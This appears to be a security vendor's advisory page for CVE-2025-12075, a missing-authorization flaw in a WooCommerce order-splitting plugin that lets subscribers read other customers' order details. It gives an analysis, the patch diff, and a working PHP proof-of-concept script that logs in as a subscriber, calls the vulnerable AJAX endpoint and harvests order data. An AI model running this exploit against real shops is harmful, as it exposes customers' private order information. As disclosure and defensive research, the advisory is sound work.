Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-12075: Order Splitter for WooCommerce <= 5.3.5 – Missing Authorization to Authenticated (Subscriber+) Order Information Exposure (woo-order-splitter)

Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 5.3.5
Patched Version 5.3.6
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12075:
The Order Splitter for WooCommerce plugin for WordPress contains a missing authorization vulnerability in its troubleshooting AJAX endpoint. This flaw allows authenticated users with Subscriber-level permissions or higher to access sensitive order information belonging to other users. The vulnerability affects all plugin versions up to and including 5.3.5, with a CVSS score of 4.3.

The root cause is the absence of capability checks and nonce verification in the `wos_troubleshooting()` function within `/woo-order-splitter/inc/functions-troubleshooting.php`. The vulnerable code begins execution at line 3 by directly extracting `$_POST` data without validation. It immediately processes the `order_id` parameter to fetch and display order details. No authorization checks exist before the function accesses sensitive order metadata, item data, shipping information, and vendor details through WooCommerce API calls like `wc_get_order()`, `$order->get_items()`, and `get_post_field()`.

Exploitation requires an authenticated WordPress user with any role (including Subscriber) to send a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wos_troubleshooting`. The attacker must include a valid `order_id` parameter pointing to another user’s order. The AJAX endpoint then returns detailed debugging information containing product names, vendor IDs, item metadata, shipping details, and order configuration settings without verifying the requester’s permission to view that order.

The patch adds three security controls. First, it implements nonce verification by checking `$_POST[‘wc_os_nonce’]` against `wp_verify_nonce()` with action `’wc_os_nonce_action’`. Second, it adds a capability check requiring either `manage_woocommerce` or `edit_shop_orders` permissions, which are typically reserved for shop managers and administrators. Third, it sanitizes the `order_id` input using `intval()`. These changes restrict endpoint access to authorized personnel only and prevent CSRF attacks.

Successful exploitation exposes sensitive order information including product details, vendor relationships, item metadata, shipping data, and order configuration. Attackers can harvest commercial intelligence, map vendor networks, and potentially gather data for social engineering or competitive analysis. While the vulnerability does not allow order modification, the information disclosure violates customer privacy and business confidentiality.

Differential between vulnerable and patched code

Code Diff
--- a/woo-order-splitter/inc/functions-troubleshooting.php
+++ b/woo-order-splitter/inc/functions-troubleshooting.php
@@ -1,126 +1,140 @@
 <?php

 	function wos_troubleshooting() {
-		extract($_POST);
-		$ret = array();
-
-		$order = wc_get_order($order_id);
-		if (!$order) {
-			wp_send_json_error('Order not found');
-		}
-
-		global $wc_os_settings, $wos_actions_arr;
-
-		$hex = '#' . wc_os_random_color();
-		list($r, $g, $b) = sscanf($hex, "#%02x%02x%02x");
-		$ret['color'] = ['r' => $r, 'g' => $g, 'b' => $b];
-		$ret['color_hex'] = $hex;
-		$ret['order_id'] = $order_id;
-		$ret['split_method'] = $wc_os_settings['wc_os_ie'];
-
-		$meta = wc_os_get_order_meta($order_id);
-		$wc_os_meta_keys = get_option('wc_os_meta_keys', array());
-		$items = $order->get_items();
-		$shipping_items = $order->get_items('shipping');

-		$split_method_key = $ret['split_method'];
-		$split_method_label = $wos_actions_arr[ $split_method_key ]['action'] ?? ucfirst(str_replace('_', ' ', $split_method_key));
+		$ret = array('html'=>'');

-
-
-		$debug_output = [];
-
-		$debug_output[] = '<div class="wos-troubleshoot-method"><h3>Split Method: ' . esc_html($split_method_key) . ' — ' . esc_html($split_method_label) . '</h3></div>';
-		$debug_output[] = '<div class="wos-meta-keys"><h4>Configured Meta Keys for Grouping:</h4><pre>' . print_r($wc_os_meta_keys, true) . '</pre></div>';
-
-		$wc_os_order_splitter = new wc_os_order_splitter;
-
-		$debug_output[] = '<div class="wos-split-order-logic"><h4>Expected Output:</h4><pre>'.print_r($wc_os_order_splitter->split_order_logic($order_id, false, true), true).'</pre></div>';
-
-		// Generic items listing
-		foreach ($items as $item_id => $item) {
-			$product_id = $item->get_product_id();
-			$product = wc_get_product($product_id);
-			$vendor_id = get_post_field('post_author', $product_id);
-			$vendor_name = get_the_author_meta('display_name', $vendor_id);
-
-			$debug_output[] = '<div style="border:1px solid #ccc; padding:10px; margin-bottom:10px;">';
-
-			$debug_output[] = '<div style="margin-bottom:5px;"><strong>Item ID:</strong> ' . $item_id . '</div>';
+		if ( ! isset($_POST['wc_os_nonce']) || ! wp_verify_nonce($_POST['wc_os_nonce'], 'wc_os_nonce_action') ) {

-			$debug_output[] = '<div style="margin-bottom:5px;"><strong>Product ID:</strong> ' . $product_id . ' - ' . esc_html($product->get_name()) . '</div>';
+			wp_send_json_error(__('Sorry, your nonce did not verify.', 'woo-order-splitter'));

-			$debug_output[] = '<div style="margin-bottom:5px;"><strong>Vendor ID:</strong> ' . $vendor_id . ' (' . esc_html($vendor_name) . ')</div>';
+		} elseif ( ! current_user_can('manage_woocommerce') && ! current_user_can('edit_shop_orders') ) {

-			$debug_output[] = '<div style="margin-bottom:5px;"><strong>Item Meta:</strong><pre style="margin:0;">' . print_r($item->get_meta_data(), true) . '</pre></div>';
+			wp_send_json_error(__('You do not have permission to access this resource.', 'woo-order-splitter'));

+		} else {
+
+			extract($_POST);
+			$order_id = isset($_POST['order_id']) ? intval($_POST['order_id']) : 0;
+
+
+			$order = wc_get_order($order_id);
+			if (!$order) {
+				wp_send_json_error('Order not found');
+			}
+
+			global $wc_os_settings, $wos_actions_arr;
+
+			$hex = '#' . wc_os_random_color();
+			list($r, $g, $b) = sscanf($hex, "#%02x%02x%02x");
+			$ret['color'] = ['r' => $r, 'g' => $g, 'b' => $b];
+			$ret['color_hex'] = $hex;
+			$ret['order_id'] = $order_id;
+			$ret['split_method'] = $wc_os_settings['wc_os_ie'];
+
+			$meta = wc_os_get_order_meta($order_id);
+			$wc_os_meta_keys = get_option('wc_os_meta_keys', array());
+			$items = $order->get_items();
+			$shipping_items = $order->get_items('shipping');

-			$debug_output[] = '</div>';
+			$split_method_key = $ret['split_method'];
+			$split_method_label = $wos_actions_arr[ $split_method_key ]['action'] ?? ucfirst(str_replace('_', ' ', $split_method_key));

-
-

-			// Add conditional rendering for known split methods
-			switch ($ret['split_method']) {
-				case 'group_by_order_item_meta':
-				case 'group_by_gf_meta':
-					$meta_keys = get_option('wc_os_gf_meta_keys', []);
-					$debug_output[] = '<span style="color:red">[!] Missing Group-by Meta Keys?</span>';
-					$debug_output[] = '<pre>' . print_r($meta_keys, true) . '</pre>';
-					break;
-				case 'group_by_attributes_value':
-					$debug_output[] = '<span style="color:red">[!] Attributes Value Grouping Check Needed</span>';
-					break;
-				case 'group_by_woo_vendors':
-					$vendor_term = wp_get_post_terms($product_id, 'wcpv_product_vendors');
-					$group_letter = '';
-					if (!empty($vendor_term)) {
-						$term_id = $vendor_term[0]->term_id;
-						foreach ((array) $wc_os_settings['wc_os_woo_vendors'] as $letter => $vendor_ids) {
-							if (in_array($term_id, (array) $vendor_ids)) {
-								$group_letter = strtoupper($letter);
-								break;
+
+			$debug_output = [];
+
+			$debug_output[] = '<div class="wos-troubleshoot-method"><h3>Split Method: ' . esc_html($split_method_key) . ' — ' . esc_html($split_method_label) . '</h3></div>';
+			$debug_output[] = '<div class="wos-meta-keys"><h4>Configured Meta Keys for Grouping:</h4><pre>' . print_r($wc_os_meta_keys, true) . '</pre></div>';
+
+			$wc_os_order_splitter = new wc_os_order_splitter;
+
+			$debug_output[] = '<div class="wos-split-order-logic"><h4>Expected Output:</h4><pre>'.print_r($wc_os_order_splitter->split_order_logic($order_id, false, true), true).'</pre></div>';
+
+			// Generic items listing
+			foreach ($items as $item_id => $item) {
+				$product_id = $item->get_product_id();
+				$product = wc_get_product($product_id);
+				$vendor_id = get_post_field('post_author', $product_id);
+				$vendor_name = get_the_author_meta('display_name', $vendor_id);
+
+				$debug_output[] = '<div style="border:1px solid #ccc; padding:10px; margin-bottom:10px;">';
+
+				$debug_output[] = '<div style="margin-bottom:5px;"><strong>Item ID:</strong> ' . $item_id . '</div>';
+
+				$debug_output[] = '<div style="margin-bottom:5px;"><strong>Product ID:</strong> ' . $product_id . ' - ' . esc_html($product->get_name()) . '</div>';
+
+				$debug_output[] = '<div style="margin-bottom:5px;"><strong>Vendor ID:</strong> ' . $vendor_id . ' (' . esc_html($vendor_name) . ')</div>';
+
+				$debug_output[] = '<div style="margin-bottom:5px;"><strong>Item Meta:</strong><pre style="margin:0;">' . print_r($item->get_meta_data(), true) . '</pre></div>';
+
+
+				$debug_output[] = '</div>';
+
+
+
+
+				// Add conditional rendering for known split methods
+				switch ($ret['split_method']) {
+					case 'group_by_order_item_meta':
+					case 'group_by_gf_meta':
+						$meta_keys = get_option('wc_os_gf_meta_keys', []);
+						$debug_output[] = '<span style="color:red">[!] Missing Group-by Meta Keys?</span>';
+						$debug_output[] = '<pre>' . print_r($meta_keys, true) . '</pre>';
+						break;
+					case 'group_by_attributes_value':
+						$debug_output[] = '<span style="color:red">[!] Attributes Value Grouping Check Needed</span>';
+						break;
+					case 'group_by_woo_vendors':
+						$vendor_term = wp_get_post_terms($product_id, 'wcpv_product_vendors');
+						$group_letter = '';
+						if (!empty($vendor_term)) {
+							$term_id = $vendor_term[0]->term_id;
+							foreach ((array) $wc_os_settings['wc_os_woo_vendors'] as $letter => $vendor_ids) {
+								if (in_array($term_id, (array) $vendor_ids)) {
+									$group_letter = strtoupper($letter);
+									break;
+								}
 							}
 						}
-					}
-					$debug_output[] = '<div class="wos-vendor-group"><strong>Vendor Group:</strong> <span class="vendor-group-letter">' . esc_html($group_letter) . '</span></div>';
-					$debug_output[] = '<div class="wos-vendor-terms"><strong>Vendor Terms:</strong><pre>' . print_r($vendor_term, true) . '</pre></div>';
-					break;
-
-				case 'group_by_vendors':
-					$vendor_term = wp_get_post_terms($product_id, 'wcpv_product_vendors');
-					$debug_output[] = '<strong>Vendor Terms:</strong><pre>' . print_r($vendor_term, true) . '</pre>';
-					break;
-				case 'quantity_split':
-					$debug_output[] = '<span style="color:red">[!] Quantity Ratio or Threshold Info Missing?</span>';
-					break;
-				case 'group_by_partial_payment':
-					$debug_output[] = '<span style="color:red">[!] Booking/Partial Payment Meta Missing?</span>';
-					break;
-				case 'subscription_split':
-					$debug_output[] = '<span style="color:red">[!] Delivery Date Check?</span>';
-					break;
-				case 'group_by_acf_group_fields':
-					$acf_value = get_post_meta($product_id, 'acf_group_field', true);
-					$debug_output[] = '<strong>ACF Value:</strong><pre>' . print_r($acf_value, true) . '</pre>';
-					break;
-				default:
-					$debug_output[] = '<span style="color:red">[!] Custom check not defined for method: ' . esc_html($ret['split_method']) . '</span>';
-					break;
+						$debug_output[] = '<div class="wos-vendor-group"><strong>Vendor Group:</strong> <span class="vendor-group-letter">' . esc_html($group_letter) . '</span></div>';
+						$debug_output[] = '<div class="wos-vendor-terms"><strong>Vendor Terms:</strong><pre>' . print_r($vendor_term, true) . '</pre></div>';
+						break;
+
+					case 'group_by_vendors':
+						$vendor_term = wp_get_post_terms($product_id, 'wcpv_product_vendors');
+						$debug_output[] = '<strong>Vendor Terms:</strong><pre>' . print_r($vendor_term, true) . '</pre>';
+						break;
+					case 'quantity_split':
+						$debug_output[] = '<span style="color:red">[!] Quantity Ratio or Threshold Info Missing?</span>';
+						break;
+					case 'group_by_partial_payment':
+						$debug_output[] = '<span style="color:red">[!] Booking/Partial Payment Meta Missing?</span>';
+						break;
+					case 'subscription_split':
+						$debug_output[] = '<span style="color:red">[!] Delivery Date Check?</span>';
+						break;
+					case 'group_by_acf_group_fields':
+						$acf_value = get_post_meta($product_id, 'acf_group_field', true);
+						$debug_output[] = '<strong>ACF Value:</strong><pre>' . print_r($acf_value, true) . '</pre>';
+						break;
+					default:
+						$debug_output[] = '<span style="color:red">[!] Custom check not defined for method: ' . esc_html($ret['split_method']) . '</span>';
+						break;
+				}
 			}
-		}
-
-		$debug_output[] = '<h4>Order Meta:</h4>';
-		$debug_output[] = '<pre>' . print_r($meta, true) . '</pre>';
-
-		$debug_output[] = '<h4>Shipping Items:</h4>';
-		$debug_output[] = '<pre>' . print_r($shipping_items, true) . '</pre>';

-		$debug_output[] = '<h4>$wc_os_settings:</h4>';
-		$debug_output[] = '<pre>' . print_r($wc_os_settings, true) . '</pre>';
-
-		$ret['html'] = implode("n", $debug_output);
-
+			$debug_output[] = '<h4>Order Meta:</h4>';
+			$debug_output[] = '<pre>' . print_r($meta, true) . '</pre>';
+
+			$debug_output[] = '<h4>Shipping Items:</h4>';
+			$debug_output[] = '<pre>' . print_r($shipping_items, true) . '</pre>';
+
+			$debug_output[] = '<h4>$wc_os_settings:</h4>';
+			$debug_output[] = '<pre>' . print_r($wc_os_settings, true) . '</pre>';
+
+			$ret['html'] = implode("n", $debug_output);
+		}
 		wp_send_json($ret);
 	}

--- a/woo-order-splitter/index.php
+++ b/woo-order-splitter/index.php
@@ -3,7 +3,7 @@
 	Plugin Name: Order Splitter for WooCommerce
 	Plugin URI: https://wordpress.org/plugins/woo-order-splitter
 	Description: Split, merge, clone, your crowd/combined/bulk orders using intelligent rules.
-	Version: 5.3.5
+	Version: 5.3.6
 	Author: Fahad Mahmood
 	Author URI: http://androidbubble.com/blog/
 	Text Domain: woo-order-splitter

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12075 - Order Splitter for WooCommerce <= 5.3.5 - Missing Authorization to Authenticated (Subscriber+) Order Information Exposure

<?php
/**
 * Proof of Concept for CVE-2025-12075
 * Demonstrates unauthorized order information access via the wos_troubleshooting AJAX endpoint.
 * Requires valid WordPress subscriber credentials and an existing order ID.
 */

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';
$order_id = 123; // Target order ID to exfiltrate

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// First, authenticate to WordPress
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Verify login success by checking for dashboard redirect or error
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Now exploit the vulnerable endpoint
$exploit_data = array(
    'action' => 'wos_troubleshooting',
    'order_id' => $order_id
);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

// Parse and display the stolen order information
$data = json_decode($response, true);
if (isset($data['html'])) {
    echo "[+] Successfully accessed order #{$order_id} information:nn";
    // Extract and display key sensitive data patterns
    if (preg_match_all('/<strong>Product ID:</strong>s*(.*?)s*</div>/', $data['html'], $matches)) {
        echo "Product Details:n";
        foreach ($matches[1] as $product) {
            echo "  - {$product}n";
        }
    }
    if (preg_match('/<h4>Order Meta:</h4>s*<pre>(.*?)</pre>/s', $data['html'], $match)) {
        echo "nOrder Metadata (truncated): ".substr($match[1], 0, 200)."...n";
    }
    echo "nFull HTML debug output saved to order_debug.htmln";
    file_put_contents('order_debug.html', $data['html']);
} else {
    echo "[-] Exploit failed. Response: ".htmlspecialchars($response)."n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School